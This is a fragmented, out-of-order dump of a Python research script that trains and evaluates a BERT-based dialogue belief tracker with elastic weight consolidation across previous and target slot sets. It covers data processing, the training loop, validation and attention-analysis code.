raise ValueError(\"At least one of `do_train` or `do_eval`", "= [\"[CLS]\"] + tokens_a + [\"[SEP]\"] input_len = [len(tokens), 0] if tokens_b: tokens", "args.task_name.find(\"gru\") == -1 and args.task_name.find(\"lstm\") == -1: raise ValueError(\"Task name should include at", "to perform linear learning rate warmup for. \" \"E.g., 0.1 = 10%% of", "= all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim) return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids def get_label_embedding(labels, max_seq_length, tokenizer,", "optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer) ############################################################################### # Training code ############################################################################### if", "1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" % slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\"", "accumulation=accumulation) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length)", "acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss.mean() acc", "padded.\") parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden dimension used in belief tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1,", "tr_loss / nb_tr_steps if args.do_train else None result = {'eval_loss': eval_loss, 'eval_accuracy': eval_accuracy,", "nlabels for sid, slot_acc in enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\" % (sid, slot_acc)) writer.write(\"total class accuracy", "\"w\") as writer: total_class_acc = 0 total_slot_class_acc = [] nlabels = 0 for", "key, str(result[key])) writer.write(\"%s = %s\\n\" % (key, str(result[key]))) ############################################################################### # Analyze: TODO ###############################################################################", "in place to the maximum length.\"\"\" while True: total_length = len(tokens_a) + len(tokens_b)", "= SequentialSampler(dev_data) dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size) logger.info(\"Loaded data!\") ############################################################################### # Build the", "loss = loss / args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss) else: loss.backward() if summary_writer is", "last_update + args.patience <= epoch: break ############################################################################### # Evaluation ############################################################################### # Test output_model_file", "processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids = convert_examples_to_features( eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids,", "+ len(tokens_b) if total_length <= max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop() else:", "and last_update + args.patience <= epoch: if last_update + args.patience <= epoch: break", "ewc.penalty(model) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else:", "# Build the models ############################################################################### # Prepare model if args.nbt =='rnn': from BeliefTrackerSlotQueryMultiSlot", "special warm up BERT uses lr_this_step = args.learning_rate * warmup_linear(global_step / t_total, args.warmup_proportion)", "`InputExample`s for the dev set.\"\"\" raise NotImplementedError() def get_labels(self): \"\"\"Gets the list of", "in dialog: text = turn['input'] + '\\t' for label, pred in zip(turn['label'], turn['pred']):", "input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) with torch.no_grad(): _, _, acc, _, pred_slot = model(input_ids,", "task label_list = prev_label_list + target_label_list # All slot value labels num_labels =", "key in rename_list: new_key = key.replace('rnn.', 'nbt.') ptr_model[new_key] = ptr_model[key] del ptr_model[key] state", "trained slots. ex. '0:1:2 or an excluding slot name 'attraction'\" ) parser.add_argument(\"--tf_dir\", default='tensorboard',", "dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu) for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"): # for epoch", "sets.\"\"\" prev_dialogue_index = None examples = [] for (i, line) in enumerate(lines): guid", "ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu) for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"):", "sequence length. input_ids += [0] * (max_seq_length - len(input_ids)) # Note: padding idx", "############################################################################### # Data Preprocessing ############################################################################### class InputExample(object): \"\"\"A single training/test example for simple", "(default value): dynamic loss scaling.\\n\" \"Positive power of 2: static loss scaling value.\\n\")", "BERT utterance encoder\") ## Other parameters parser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The maximum total input", "validation dataset model.eval() dev_loss = 0 dev_acc = 0 dev_loss_slot, dev_acc_slot = None,", "in zip(input_ids[0], label_ids[0], pred_slot[0]): if label[0] == -1: break text = {} text['input']", "directory\") parser.add_argument(\"--nbt\", default='rnn', type=str, required=True, help=\"nbt type: rnn or transformer or turn\" )", "l in prev_loss_slot] prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn else: for i, l in", "Num examples = %d\", len(eval_examples)) logger.info(\" Batch size = %d\", 1) eval_data =", "if not acc == 1: dialog = [] for input, label, pred in", "range(num_labels[i])] for i in range(len(num_labels))] class_count = [[0 for x in range(num_labels[i])] for", "if args.do_train: if n_gpu == 1: torch.save(model.state_dict(), output_model_file) else: torch.save(model.module.state_dict(), output_model_file) last_update =", "not care' if label=='dontcare' else label def _get_label(label, label_list): label_id = [] label_info", "/ args.gradient_accumulation_steps) # Set the random seed manually for reproducibility. random.seed(args.seed) np.random.seed(args.seed) torch.manual_seed(args.seed)", "Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, Valid prev loss=%.6f, Valid prev acc=%.6f ***\" \\", "slot in enumerate(class_count): slot_class_acc = 0 for vid, value in enumerate(slot): if not", "0] if tokens_b: tokens += tokens_b + [\"[SEP]\"] input_len[1] = len(tokens_b) + 1", "enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace(' ','_'), acc_slot[i], global_step)", "if label=='dontcare' else label def _get_label(label, label_list): label_id = [] label_info = ''", "prev acc=%.6f ***\" \\ % (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc)) dev_loss = round(dev_loss,", "< best_loss: # Save a trained model output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") if args.do_train:", "%s\" % example.guid) logger.info(\"tokens: %s\" % \" \".join([str(x) for x in tokens])) logger.info(\"input_ids:", "train model. ex. '0:1:2 or an excluding slot name 'attraction'\" ) parser.add_argument(\"--prev_slot\", default='',", "least one of `do_train` or `do_eval` must be True.\") ############################################################################### # Load data", "key in ptr_model.keys(): if ('slot_lookup' in key) or ('value_lookup' in key): # remove", "args.lambda_ewc * ewc.penalty(model) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu,", "help=\"Whether to run analysis on the test set.\") parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set this flag", "and args.task_name.find(\"lstm\") == -1: raise ValueError(\"Task name should include at least \\\"gru\\\" or", "0 prev_dev_loss_slot, prev_dev_acc_slot = None, None prev_nb_dev_examples = 0 for step, batch in", "Loss=%.6f, Validation Acc=%.6f ***\" % (epoch, dev_loss, dev_acc)) #if epoch > 100 and", "args.max_turn_length) logger.info(\"***** Running validation *****\") logger.info(\" Num examples = %d\", len(dev_examples)) logger.info(\" Batch", "input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss.mean() acc = acc.mean() acc_slot = acc_slot.mean(0)", "prev_eval_acc_slot = None, None nb_eval_examples_prev = 0 for input_ids, input_len, label_ids, prev_label_ids in", "- x ############################################################################### # Main ############################################################################### def main(): parser = argparse.ArgumentParser() ## Required", "output directory where the model predictions and checkpoints will be written.\") parser.add_argument('--load_path', type=str,", "the random seed manually for reproducibility. random.seed(args.seed) np.random.seed(args.seed) torch.manual_seed(args.seed) if n_gpu > 0:", "n_gpu=n_gpu) for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"): # for epoch in trange(1): #### TRAIN", "(args.local_rank == -1 or torch.distributed.get_rank() == 0): pdb.set_trace() def draw(data, x, y, ax):", "num_labels, device) if args.fp16: model.half() # Load pretrained model # in the case", "% (label, label_map[i][label]) return label_id, label_info features = [] prev_dialogue_idx = None all_padding", "max_len = input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len) for slot in range(0,", "validation.\") parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total batch size for eval.\") parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The", "in enumerate(class_count): slot_class_acc = 0 for vid, value in enumerate(slot): if not value", "= [] rename_list = [] for key in ptr_model.keys(): if ('slot_lookup' in key)", "# line[3]: system response label = [ line[4+idx] for idx in self.target_slot_idx] prev_label", "step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")): batch = tuple(t.to(device) for t in batch) input_ids,", "from pytorch_pretrained_bert.optimization import BertAdam from tensorboardX import SummaryWriter import pdb import matplotlib.pyplot as", "label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss, loss_slot, acc,", "line[4+idx] for idx in self.target_slot_idx] prev_label = [ line[4+idx] for idx in self.prev_slot_idx]", "+= prev_loss.item() * prev_num_valid_turn prev_dev_acc += prev_acc.item() * prev_num_valid_turn if n_gpu == 1:", "else: loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss", "0 prev_eval_loss_slot, prev_eval_acc_slot = None, None nb_eval_examples_prev = 0 for input_ids, input_len, label_ids,", "\\ _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex) prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy,", "in features], dtype=torch.long) all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long) all_prev_label_ids =", "and not args.no_cuda else \"cpu\") n_gpu = torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\",", "= tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, _ = batch if", "!= -1).sum().item() nb_eval_examples += nb_eval_ex nb_eval_steps += 1 def _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot,", "key) or ('value_lookup' in key): # remove slot_lookup and value_lookup del_list.append(key) if ('rnn.'", "for l in loss_slot] dev_acc_slot = acc_slot * num_valid_turn prev_dev_loss_slot = [ l", "default=0, help=\"Loss scaling to improve fp16 numeric stability. Only used when fp16 set", "to use CUDA when available\") parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank for distributed training on", "Present task label_list = prev_label_list + target_label_list # All slot value labels num_labels", "all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) if args.local_rank == -1:", "slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace(' ','_'), acc_slot[i], global_step) tr_loss += loss.item()", "global_step) tr_loss += loss.item() nb_tr_examples += input_ids.size(0) nb_tr_steps += 1 if (step +", "1: model = model.module state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get slot-value", "that slot and values are different between the training and evaluation ptr_model =", "acc, acc_slot, nb_eval_ex): eval_loss += loss.item() * nb_eval_ex eval_accuracy += acc.item() * nb_eval_ex", "in range(len(num_labels))] eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids = convert_examples_to_features( eval_examples, label_list,", "Data Preprocessing ############################################################################### class InputExample(object): \"\"\"A single training/test example for simple sequence classification.\"\"\"", "= SummaryWriter(\"./%s/%s\" % (args.tf_dir, tb_file_name)) else: summary_writer = None fileHandler = logging.FileHandler(os.path.join(args.output_dir, \"%s.txt\"%(tb_file_name)))", "apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\") optimizer = FusedAdam(optimizer_grouped_parameters, lr=args.learning_rate,", "tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, _ = batch if n_gpu", "warmup_linear(global_step / t_total, args.warmup_proportion) if summary_writer is not None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for", "loss = loss_ + args.lambda_ewc * loss_ewc prev_loss, _, prev_acc, prev_acc_slot, _ =", "enumerate(slot): if not value == 0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc)", "value == 0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc) ) slot_class_acc +=", "/ nb_dev_examples prev_dev_loss = prev_dev_loss / prev_nb_dev_examples prev_dev_acc = prev_dev_acc / prev_nb_dev_examples if", "logger.info(optimizer) ############################################################################### # Training code ############################################################################### if args.do_train: logger.info(\"Training...\") global_step = 0 last_update", "############################################################################### # Training code ############################################################################### if args.do_train: logger.info(\"Training...\") global_step = 0 last_update =", "idx in self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot = self.prev_slot + self.target_slot logger.info('Processor: previous slots: '", "config.target_slot: target_slot.append(value) else: prev_slot.append(value) config.target_slot = ':'.join(target_slot) config.prev_slot = ':'.join(prev_slot) else: raise NotImplementedError()", "data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\", accumulation) def get_test_examples(self,", "slot.replace(' ','_'), acc_slot[i], global_step) tr_loss += loss.item() nb_tr_examples += input_ids.size(0) nb_tr_steps += 1", "# Training code ############################################################################### if args.do_train: logger.info(\"Training...\") global_step = 0 last_update = None", "parser = argparse.ArgumentParser() ## Required parameters parser.add_argument('--data_dir', type=str, required=True, help='location of the data", "list(range(0, len(processor.prev_slot))) # List of slots in previous task target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot)))", "t_total, args.warmup_proportion) if summary_writer is not None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for param_group in", "args.max_turn_length) logger.info(\"***** Running training *****\") logger.info(\" Num examples = %d\", len(train_examples)) logger.info(\" Batch", "{'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[] prev_slot = [] for", "= list(self.ontology.items()) for idx, domain in enumerate(ontology_items): slot, value = domain if slot", "slot-type embeddings ## Note: slot embeddings are ordered as [previous slots + present", "required=True, help=\"The output directory where the model predictions and checkpoints will be written.\")", "and args.do_train: raise ValueError(\"Output directory ({}) already exists and is not empty.\".format(args.output_dir)) os.makedirs(args.output_dir,", "is not None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for param_group in optimizer.param_groups: param_group['lr'] = lr_this_step", "all_label_ids, all_prev_label_ids = convert_examples_to_features( train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running training", "will be truncated, and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_turn_length\",", "0 and line[0][0] == '#': # ignore comments (starting with '#') continue lines.append(line)", "acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss_ + args.lambda_ewc", "f in features], dtype=torch.long) all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long) all_prev_label_ids", "2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0)", "############################################################################### # Miscellaneous functions ############################################################################### def accuracy(out, labels): outputs = np.argmax(out, axis=1) return", "'.join(self.prev_slot)) logger.info('Processor: target slots: '+ ', '.join(self.target_slot)) def get_train_examples(self, data_dir, accumulation=False): \"\"\"See base", "max_turn) for (ex_index, example) in enumerate(examples): tokens_a = [x if x != '#'", "loss_ewc else: loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)", "1) % args.gradient_accumulation_steps == 0: # modify learning rate with special warm up", "for input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids", "be >= 1\".format( args.gradient_accumulation_steps)) args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps) # Set the random", "\"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\") model =", "= [ l * num_valid_turn for l in loss_slot] dev_acc_slot = acc_slot *", "p.requires_grad] no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters = [ {'params': [p for n,", "Training code ############################################################################### if args.do_train: logger.info(\"Training...\") global_step = 0 last_update = None best_loss", "convert_examples_to_features( eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ =", "in model.named_parameters() if p.requires_grad] no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters = [ {'params':", "raise ValueError(\"Task name should include at least \\\"gru\\\" or \\\"lstm\\\"\") elif args.nbt =='turn':", "model.eval() none_value_id = [ len(val)-1 for val in label_list] incorrect_dialogs = [] attention_draw", "1) assert len(features) % max_turn_length == 0 all_input_ids = torch.tensor([f.input_ids for f in", "not args.do_analyze: raise ValueError(\"At least one of `do_train` or `do_eval` must be True.\")", "max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len, label_id=label_id, prev_label_id=prev_label_id, )) prev_dialogue_idx = curr_dialogue_idx prev_turn_idx = curr_turn_idx if", "batch size for validation.\") parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total batch size for eval.\") parser.add_argument(\"--learning_rate\",", "'prev_eval_loss_slot': '\\t'.join([str(val / nb_eval_examples_prev) for val in prev_eval_loss_slot]), 'prev_eval_acc_slot': '\\t'.join([str((val).item()) for val in", "dev_loss / nb_dev_examples dev_acc = dev_acc / nb_dev_examples prev_dev_loss = prev_dev_loss / prev_nb_dev_examples", "max_turn_length == 0 if prev_dialogue_idx is None or prev_turn_idx < max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len,", "model output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") if args.do_train: if n_gpu == 1: torch.save(model.state_dict(), output_model_file)", "== torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0, 0:10, 0:8].cpu() ==", "data converters for sequence classification data sets.\"\"\" def get_train_examples(self, data_dir): \"\"\"Gets a collection", "len(tokens_a) + len(tokens_b) if total_length <= max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop()", "= get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total = num_train_steps if args.local_rank != -1:", "range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn %d slot: %s label: %s pred:", "loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc if args.gradient_accumulation_steps >", "data!\") ############################################################################### # Build the models ############################################################################### # Prepare model if args.nbt =='rnn':", "of the slots self.ontology = collections.OrderedDict(sorted(ontology.items())) # select slots to train self.target_slot =", "0).item() prev_dev_loss += prev_loss.item() * prev_num_valid_turn prev_dev_acc += prev_acc.item() * prev_num_valid_turn if n_gpu", "eval_loss_slot is None: eval_loss_slot = [ l * nb_eval_ex for l in loss_slot]", "nb_eval_ex for l in loss_slot] else: for i, l in enumerate(loss_slot): eval_loss_slot[i] =", "input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) with torch.no_grad(): _, _, acc, _,", "tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids = all_input_ids.to(device), all_input_len.to( device), all_label_ids.to(device) logger.info(\"***** Running analysis", "0] max_turn = 0 for (ex_index, example) in enumerate(examples): if max_turn < int(example.guid.split('-')[2]):", "required=True, help=\"Previous trained slots. ex. '0:1:2 or an excluding slot name 'attraction'\" )", "prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids,", "idx, x in enumerate(label.cpu().numpy())] text['pred'] = [str(label_list[idx][x]) for idx, x in enumerate(pred.cpu().numpy())] dialog.append(text)", "in enumerate(prev_loss_slot): prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn prev_dev_acc_slot += prev_acc_slot *", "level=logging.INFO) logger = logging.getLogger(__name__) ############################################################################### # Data Preprocessing ############################################################################### class InputExample(object): \"\"\"A single", "parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The number of epochs to allow no further improvement.\") parser.add_argument(\"--warmup_proportion\",", "= processor.get_prev_labels() # Slot value labels of Previous task target_label_list = processor.get_labels() #", "in the case that slot and values are different between the training and", "of the pretrained BERT model\") parser.add_argument(\"--task_name\", default=None, type=str, required=True, help=\"The name of the", "prev_turn_idx < max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len, label_id=label_id, prev_label_id=prev_label_id, )) prev_dialogue_idx = curr_dialogue_idx prev_turn_idx =", "def get_optimizer_grouped_parameters(model): param_optimizer = [(n, p) for n, p in model.named_parameters() if p.requires_grad]", "_ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ = loss_.mean() acc = acc.mean()", "[[0 for x in range(num_labels[i])] for i in range(len(num_labels))] class_count = [[0 for", "prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) nb_eval_ex_prev", "device) label_token_ids.append(token_ids) label_len.append(lens) ## Get slot-type embeddings ## Note: slot embeddings are ordered", "be padded.\") parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden dimension used in belief tracker\") parser.add_argument('--num_rnn_layers', type=int,", "= acc.mean() acc_slot = acc_slot.mean(0) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len,", "\\ all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev) dev_sampler =", "= prev_eval_acc_slot / nb_eval_examples_prev total_acc_slot = {} for val, idx in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]),", "\"\"\"Gets the list of labels for this data set.\"\"\" raise NotImplementedError() @classmethod def", "metric for distance between label embeddings: cosine, euclidean.\") parser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch", "{}, 16-bits training: {}\".format( device, n_gpu, bool(args.local_rank != -1), args.fp16)) if args.gradient_accumulation_steps <", "(max_turn_length - prev_turn_idx - 1) assert len(features) % max_turn_length == 0 all_input_ids =", "_post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex): eval_loss += loss.item() *", "batch if n_gpu == 1: loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len,", "\".join([str(x) for x in tokens])) logger.info(\"input_ids: %s\" % \" \".join([str(x) for x in", "= torch.tensor([f.prev_label_id for f in features], dtype=torch.long) # reshape tensors to [batch, turn,", "tracking dataset (GLUE version).\"\"\" def __init__(self, config): super(Processor, self).__init__() import json if config.data_dir", "prev_label_list + target_label_list # All slot value labels num_labels = [len(labels) for labels", "== torch.Tensor(none_value_id[0:8]).long().repeat(10, 1)) print(label_ids[0, 0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace() if drawfig ==", "logger.info(\"device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}\".format( device, n_gpu, bool(args.local_rank", "prev_dev_acc_slot = None, None prev_nb_dev_examples = 0 for step, batch in enumerate(tqdm(dev_dataloader, desc=\"Validation\")):", "logger = logging.getLogger(__name__) ############################################################################### # Data Preprocessing ############################################################################### class InputExample(object): \"\"\"A single training/test", "0 all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long) all_input_len= torch.tensor([f.input_len for f", "prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn nb_dev_examples", "+= 1 def _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex): eval_loss", "= prev_dev_loss_slot[i] + l * prev_num_valid_turn prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn nb_dev_examples +=", "slot_dim = len(label_list) prev_slot_dim = len(prev_label_list) def _hard_coding_label(label): return 'do not care' if", "(id = %d) ' % (label, label_map[i][label]) return label_id, label_info features = []", "summary_writer is not None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for param_group in optimizer.param_groups: param_group['lr'] =", "############################################################################### # Evaluation ############################################################################### # Test output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") # Load a", "The symbol '#' will be replaced with '[SEP]' after tokenization. text_a = line[2]", "/ nb_eval_examples_prev total_acc_slot = {} for val, idx in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id+prev_slot_id)): total_acc_slot[idx]", "with open(output_eval_incorr_file, \"w\") as writer: for dialog in incorrect_dialogs: for turn in dialog:", "writer: for dialog in incorrect_dialogs: for turn in dialog: text = turn['input'] +", "evaluation *****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch size = %d\",", "0): eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( eval_examples, target_label_list,", "= get_optimizer_grouped_parameters(model.module) t_total = num_train_steps if args.local_rank != -1: t_total = t_total //", "args.learning_rate * warmup_linear(global_step / t_total, args.warmup_proportion) if summary_writer is not None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step,", "pre-trained model selected in the list: bert-base-uncased, \" \"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \"", "collection of `InputExample`s for the dev set.\"\"\" raise NotImplementedError() def get_labels(self): \"\"\"Gets the", "[] attention_draw = 5 for input_ids, input_len, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim()", "+= nb_eval_ex_prev nb_eval_ex = (label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples += nb_eval_ex nb_eval_steps += 1", "eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) # Run prediction for full data eval_sampler", "for initialization\") parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help=\"Number of updates steps to accumulate before performing", "example) in enumerate(examples): if max_turn < int(example.guid.split('-')[2]): max_turn = int(example.guid.split('-')[2]) max_turn_length = min(max_turn+1,", "############################################################################### def accuracy(out, labels): outputs = np.argmax(out, axis=1) return np.sum(outputs == labels) def", "+ text_a text_b = line[3] + \" # \" + text_b else: text_a", "dev set.\"\"\" raise NotImplementedError() def get_labels(self): \"\"\"Gets the list of labels for this", "slots in present task # tokenizer vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model) if", "= get_label_embedding(labels, args.max_label_length, tokenizer, device) label_token_ids.append(token_ids) label_len.append(lens) ## Get slot-type embeddings ## Note:", "loss_ = loss_.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss", "return [ self.ontology[slot] for slot in self.prev_slot] def _create_examples(self, lines, set_type, accumulation=False): \"\"\"Creates", "torch.distributed.init_process_group(backend='nccl') logger.info(\"device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}\".format( device, n_gpu,", "slot_class_acc += class_acc nlabels += 1 else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, -1) ) total_slot_class_acc.append(slot_class_acc/(vid+1))", "+= acc.item() * num_valid_turn prev_num_valid_turn = torch.sum(prev_label_ids[:,:,0].view(-1) > -1, 0).item() prev_dev_loss += prev_loss.item()", "examples = [] for (i, line) in enumerate(lines): guid = \"%s-%s-%s\" % (set_type,", "args.lambda_ewc * loss_ewc else: loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids,", "from tqdm import tqdm, trange import numpy as np import torch from torch.utils.data", "import SummaryWriter import pdb import matplotlib.pyplot as plt import seaborn seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s -", "= line[0] else: # The symbol '#' will be replaced with '[SEP]' after", "os.path.exists(vocab_dir): raise ValueError(\"Can't find %s \" % vocab_dir) tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case) num_train_steps", "key): # rename rnn -> nbt, rename_list.append(key) for key in del_list: del ptr_model[key]", "args.gradient_accumulation_steps > 1: loss = loss / args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss) else: loss.backward()", "loss.backward() if summary_writer is not None: summary_writer.add_scalar(\"Epoch\", epoch, global_step) summary_writer.add_scalar(\"Train/Loss\", loss_, global_step) summary_writer.add_scalar(\"Train/Loss_EWC\",", "pred) writer.write(\"%s\\n\" % text) writer.write(\"---------- 